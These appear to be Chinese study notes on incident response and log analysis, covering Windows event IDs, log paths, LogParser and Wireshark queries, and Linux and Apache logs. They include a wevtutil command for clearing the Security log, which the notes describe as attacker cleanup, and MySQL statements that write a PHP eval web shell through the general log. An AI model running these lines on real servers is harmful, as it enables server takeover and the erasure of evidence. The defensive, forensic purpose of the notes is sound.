事件分类
- 有害程序事件
- 网络攻击事件
- 信息破坏事件
- 事件内容安全事件
- 设备设施故障事件
- 灾害性事件
- 其它事件
应急响应工作流程
准备阶段
检测阶段
- 判断安全设备告警
- 判断事件类型
- 判断事件级别
- 确定应急方案
抑制阶段
- 阻断:封禁IP、断开网络连接.隔离失陷主机
- 排查:排查可疑进程、排查可疑服务、审计各类日志、排查可疑账户、排查可疑文件
根除阶段
- 修复:系统漏洞.网站漏洞
- 更新:安全策略、威胁情报
- 还原:操作系统.业务系统
恢复阶段
总结阶段
日志分析简介
日志:日志文件为服务器、工作站、防火墙和应用软件等IT资源相关活动记录必要的、有价值的信息。日志文件中的记录可提供以下用途:监控系统资源;审计用户行为;对可疑行为进行告警;确定入侵行为的范围;为恢复系统提供帮助;生成调查报告;为打击计算机犯罪提供证据来源。
日志分析的目的:
在安全事件的应急处置中,日志分析的目的很明确,就是要对攻击行为进行溯源。
攻击者IP:定位攻击者,用于抓捕或者进一步溯源
攻击范围、攻击流程:摸清攻击行为,寻找过程中的安全薄弱点,进行加固防范利用的脆弱点:针对性的进行漏洞加固
日志分析常见流程
1、信息收集:为什么要做信息收集
- 事件造成的影响:确定影响面
- 事件发生的时间:锁定时间节点利于溯源分析
- 主机情况(网络拓扑、承载信息系统、账号信息等)︰猜测攻击者攻击行为,确认需要分析的日志范围
2、日志分析:
- 操作系统日志分析
- Web访问日志分析
- 其他组件日志分析
3、日志分析整理:
windows日志审计类别
日志审计是应急响应中很重要的一个部分,那么在windows下通常会对应用程序日志、安全日志以及系统日志进行审计。
-
系统日志(System.evtx)︰系统日志是记录系统中硬件、软件和系统问题的信息,用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。
-
应用程序日志(Application.evtx)︰记录程序在运行过程中的日志信息。
-
安全日志(Security.evtx)︰登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。
打开日志审计策略
在默认情况下,安全日志仅仅只记录一些简单的登录日志,因为安全日志会随着计算机的使用时间而不断增长,占用使用空间。所以若我们需要记录详细的安全日志,则需要通过修改本地策略来启用其它项的安全日志记录功能。
- 通过win+r -> gpedit.msc打开本地策略编辑器:
日志清除记录:事件ID-1102
在windows中,若运维人员开启了记录所有安全日志项,那么攻击者在拿到该服务器权限后的所有操作都可以在该安全日志中被记录到。所以清空该Security日志肯定是一个善后的必然选择。
- 通过cmd清除日志:C:\Windows\system32> wevtutil cl "logname"
windows常见日志实践ID
1102:日志清除
4720:添加用户
4726:删除用户
4624:登入
4634:注销
4625:登录失败事件
4732:将创建的用户加入到用户组中
4733:则是查看用户从哪个组中移除了
该事件记录信息中,计划任务schtasks以及at都会被记录在内:包括创建者、任务名称、任务内容等。
4698:计划任务已创建
4699:计划任务已删除
4700:计划任务已启用
4701:计划任务已停用
4702:计划任务已更新
日志路径:
C:\Windows\System32\winevt\Logs
logparser使用
EventID 事件ID
TimeGenerated 时间
Strings
命令:
LogParser.exe -i:evt -o:datagrid "select * from sec.evtx where EventID='4624'
and TimeGenerated>'2022-03-24 10:00:00'"
Linux登录日志
Linux系统日志
登录认证日志:通过分析/var/log/secure文件,我们可以得到登录信息,包含验证和授权方面的信息,sshd会将所有信息都记录其中,包括登录失败的信息。secure日志会随着时间为结尾名来进行分量保存,以防止文件过大。
apache日志分析
在http.conf中开启日志
日志文件存放在apache/logs下,access.log为访问日志
mysql日志
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/789.php';
select '<?php eval($_POST['a']) ?>';
wireshark
ip.dst==192.168.32.132
ip.src==192.168.32.132
ip.addr==192.168.32.132